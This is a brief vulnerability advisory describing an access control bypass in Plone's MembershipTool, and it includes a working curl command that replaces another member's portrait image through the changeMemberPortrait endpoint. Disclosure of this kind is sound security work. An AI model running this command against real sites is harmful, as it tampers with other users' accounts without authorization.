|
Plone MembershipTool Access Control Bypass Vulnerability
Attackers may use standard web client applications to exploit this issue. The following 'curl' command demonstrates replacing a portrait image with attacker-specified content: curl -F portrait=<path_to_file> --form-string member_id=[username] http://www.example.com/portal_membership/changeMemberPortrait |
|
|
Privacy Statement |
